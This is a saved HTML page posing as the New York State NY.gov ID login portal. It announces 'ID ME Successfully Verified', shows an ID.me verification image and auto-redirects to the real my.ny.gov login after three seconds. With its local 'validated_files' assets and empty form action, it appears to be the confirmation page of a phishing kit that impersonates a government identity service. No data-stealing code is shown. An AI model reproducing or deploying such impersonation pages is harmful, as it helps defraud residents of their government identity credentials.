<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head id="j_id1458369469_7886f8fa"><script type="text/javascript" async="" src="validated_files/recaptcha__en.js" crossorigin="anonymous" integrity="sha384-ZPSKvKG0WipeaRQyUewUQ0wMawOWTmw32n5nBKnR21FA4MBKHzMEW63JHSOUpp32"></script><script type="text/javascript" async="" src="validated_files/siteanalyze_1577.js"></script><script type="text/javascript" async="" src="validated_files/analytics.js"></script>
         <meta http-equiv="X-UA-Compatible" content="IE=edge">  <link rel="shortcut icon" href="https://dol.ny.gov/profiles/custom/webny/themes/custom/webny_theme/favicon.ico" /><meta http-equiv="refresh" content="3; url='https://my.ny.gov/LoginV4/login.xhtml'" /> <script src="validated_files/gtm.js" type="text/javascript" async=""></script><script async="" src="validated_files/analytics.js"></script><script type="text/javascript" src="validated_files/ruxitagentjs_ICA27SVfgjqrux_10205201218101503.js" data-dtconfig="app=998701f0ddcff8d4|featureHash=ICA27SVfgjqrux|vcv=2|rdnt=1|uxrgce=1|bp=2|cuc=c55jnn85|dpvc=1|lastModification=1619023702542|dtVersion=10205201218101503|tp=500,50,0,1|uxdcw=1500|vs=2|agentUri=/LoginV4/ruxitagentjs_ICA27SVfgjqrux_10205201218101503.js|reportUrl=/LoginV4/rb_ff8821ed-3c09-41dd-ad29-f1af6647ca98|rid=RID_325847610|rpid=1305635177|domain=ny.gov"></script><link type="text/css" rel="stylesheet" href="validated_files/theme.css"><link rel="stylesheet" media="screen" type="text/css" href="validated_files/myny.css"><script type="text/javascript" src="validated_files/jquery.xhtml"><!--

<meta http-equiv="refresh" content="3; url='https://www.w3docs.com'" />
//--></script><script type="text/javascript" src="validated_files/jquery-plugins.xhtml"><!--

//--></script><script type="text/javascript" src="validated_files/core.xhtml"><!--

//--></script><link rel="stylesheet" media="screen" type="text/css" href="validated_files/components.css"><script type="text/javascript" src="validated_files/components.xhtml"><!--

//--></script><script type="text/javascript" src="validated_files/captcha.xhtml"><!--

//--></script><link rel="stylesheet" media="screen" type="text/css" href="validated_files/selfregstylesheet.css"><link rel="stylesheet" media="screen" type="text/css" href="validated_files/w3.css"><script type="text/javascript"><!--
if(window.PrimeFaces){PrimeFaces.settings.locale='en_US';}
//--></script>
	<title>NY.gov ID ME</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		
	<meta name="viewport" content="width=device-width, initial-scale=1">
	

<script><!--

  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-49859957-1', 'ny.gov');
  ga('send', 'pageview');


/* Toggle between adding and removing the "responsive" class to topnav when the user clicks on the icon */
function myFunction() {
    var x = document.getElementById("myTopnav");
    if (x.className === "topnav") {
        x.className += " responsive";
    } else {
        x.className = "topnav";
    }
}

//--></script><script src="validated_files/f5cs-a_aa4vH4y2v9-3c76a782.js" id="_imp_apg_dip_" _imp_apg_cid_="f5cs-a_aa4vH4y2v9-3c76a782" _imp_apg_api_domain_="https://dip.zeronaught.com"><!--

//--></script></head>

<body class="bodyClass"> 

	<!-- DEC 2014: NEW NYS HEADER BANNER START -->

	<!-- DEC 2014: NEW NYS HEADER BANNER END -->
	
		<!-- START: Added by Raj in Dec 2014: The bannerColor is also now parametrized -->

		<ul class="topnav" id="myTopnav">
		  <li><a href="https://my.ny.gov/"><img id="Left_nav1_TopCapImage" src="validated_files/ny_map.png" style="margin-top: -5px;border: 0;width: 40px" alt="NY Map Logo"><span style="vertical-align: top;">NY.gov ID</span></a></li>
		  <li><a href="https://my.ny.gov/NYgovId/onlineservices.xhtml?nygovidlang=en" target="_blank">Online Services</a></li>
		  <li><a href="https://my.ny.gov/NYgovId/faqs.xhtml?nygovidlang=en" target="_blank">FAQs</a></li>
		  <li><a href="https://my.ny.gov/NYgovId/about.xhtml?nygovidlang=en" target="_blank">About NY.gov ID</a></li>
		  <li><a href="https://my.ny.gov/SelfRegV3/agencycontact.xhtml?nygovidlang=en" target="_blank">Help Desk Information</a></li>
		  <li><a href="https://my.ny.gov/NYgovId/privacynotice.xhtml?nygovidlang=en" target="_blank">Privacy Policy</a></li>
		  <li><a href="https://my.ny.gov/NYgovId/tos.xhtml?nygovidlang=en" target="_blank">Terms of Service</a></li>
		  <li class="icon">
		    
		  </li>
		</ul>	

	
	<div id="pageContent"><form id="loginform" name="loginform" method="post" action="" enctype="application/x-www-form-urlencoded" class="form"><span id="loginform:j_id1371991662_790d51a7"></span><script type="text/javascript"><!--
$(function(){PrimeFaces.focus(null, 'loginform:loginPanel');});
//--></script><div id="loginform:loginPanel2" class="ui-panel ui-widget ui-widget-content ui-corner-all " style="width: 100%" data-widget="widget_loginform_loginPanel2"><div id="loginform:loginPanel2_content" class="ui-panel-content ui-widget-content"><div id="loginform:loginPanel" class="ui-panel ui-widget ui-widget-content ui-corner-all bodyClass" style="width: 100%; position: relative;" data-widget="panels" aria-busy="false"><div id="loginform:loginPanel_header" class="ui-panel-titlebar ui-widget-header ui-helper-clearfix ui-corner-all"><span class="ui-panel-title">ID ME Successfully Verified</span></div><div id="loginform:loginPanel_content" class="ui-panel-content ui-widget-content">

				 <div class="w3-row" align="center"><div id="loginform:signinmessage" aria-live="polite" style="width:85%" class="smallfont ui-message"></div>
				 </div>


			 <div class="w3-row" align="center">


				<div class="nygovimage">
			    	<h1><span class="title">NY.gov ID ME</span></h1>
				</div>  	
				<div id="logincontainer"><!-- Main Container --> 
				    <p>&nbsp;<a href="https://help.id.me/hc/en-us" title="Home"><img alt="Logo" src="https://theme.zdassets.com/theme_assets/520308/4ff747d248d5fe55def0f52d3d256ed1ff0d558d.png" /></a></p><p><br /></p><main role="main"><div class="container"><div class="article-container" id="article-container"><article class="article"><section class="article-info"><div class="article-content"><div class="article-body">
<p class="wysiwyg-text-align-center"><img alt="Verified.png" height="517" src="https://help.id.me/hc/article_attachments/1500010018001/Verified.png" width="288" /></p>
<p><br /></p></div></div></section></article></div></div></main><footer class="footer"><div class="c_container"><div class="footer-row m_legal">
        </div>
      </div></footer>
	    			   
	    			   <div style="padding-top: 10px">
	    			   		<a href="https://my.ny.gov/NYgovId/tos.xhtml" target="_blank" class="ofttoslinks">NY.gov ID - Terms of Service</a>
	    			   </div>
				</div><!-- Main Container -->
				
				<div class="w3-container w3-center">
				  <div style="margin-top:45px"></div>
				</div>
								
				 
			
			</div></div><div id="loginform:doubleClickBlocker_blocker" class="ui-blockui ui-widget-overlay ui-helper-hidden ui-corner-all"></div><div id="loginform:doubleClickBlocker" class="ui-blockui-content ui-widget ui-widget-content ui-corner-all ui-helper-hidden ui-shadow"><label class="confirmationMessageHeader" for="loginform:doubleClickBlocker">Please wait</label>
					 <br><img id="loginform:j_id1371991662_790d54a0" src="validated_files/loading.gif" alt=""></div></div></div></div>
			
				<div class="w3-container w3-center">
				 <div style="margin-top:45px"></div>
				</div><input type="hidden" name="loginform_SUBMIT" value="1"><input type="hidden" name="javax.faces.ViewState" id="javax.faces.ViewState" value="kZr/lUaCK+zm6FyLP3ksikhHRj2J7LDLske3siW94T/2z90KMtqlKlY8Vikd4OGJQH1wevj/6yn0cUfdnaCR3Z24OzmsRoldrssv4TlTr5SIVb4cRLYVaBWVu3E7PZi912xDEw=="></form>
			
			
	</div>

		<div id="footer" class="footerfont" align="center"><span class="footerfont">Copyright © 2017 - New York State Office of Information Technology Services (ITS)</span>&nbsp;<span class="footerfont">Build: </span>03/17/2021 11:59 AM<span class="footerfont"> W: </span>165P&nbsp;<span class="footerfont"> A: </span>0265E_1
		</div>

	<!-- DEC 2014: NEW NYS FOOTER START -->
	
	<iframe id="nygov-universal-footer-frame" class="nygov-universal-container" src="validated_files/ajax_002.html" data-updated="2014-11-07 08:30" style="border:none; overflow:hidden; width:100%; height:200px;" scrolling="no" width="100%" height="200px" frameborder="0">
	            Your browser does not support iFrames
	</iframe>
	<!-- DEC 2014: NEW NYS FOOTER END -->
<div id="textarea_simulator" style="position: absolute; top: 0px; left: 0px; visibility: hidden;"></div><script src="validated_files/api.js" async="" defer="defer"><script type="text/javascript" id="">(function(){var a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="//siteimproveanalytics.com/js/siteanalyze_1577.js";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})();</script> <div style="background-color: rgb(255, 255, 255); border: 1px solid rgb(204, 204, 204); box-shadow: rgba(0, 0, 0, 0.2) 2px 2px 3px; position: absolute; transition: visibility 0s linear 0.3s, opacity 0.3s linear 0s; opacity: 0; visibility: hidden; z-index: 2000000000; left: 0px; top: -10000px;"><div style="width: 100%; height: 100%; position: fixed; top: 0px; left: 0px; z-index: 2000000000; background-color: rgb(255, 255, 255); opacity: 0.05;"></div><div style="border: 11px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -11px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div><div style="border: 10px solid transparent; width: 0px; height: 0px; position: absolute; pointer-events: none; margin-top: -10px; z-index: 2000000000;" class="g-recaptcha-bubble-arrow"></div><div style="z-index: 2000000000; position: relative;"><iframe title="recaptcha challenge" src="validated_files/bframe.html" style="width: 100%; height: 100%;" name="c-oclc5gnu5fzc" scrolling="no" sandbox="allow-forms allow-popups allow-same-origin allow-scripts allow-top-navigation allow-modals allow-popups-to-escape-sandbox allow-storage-access-by-user-activation" frameborder="0"></iframe></div></div></body></html>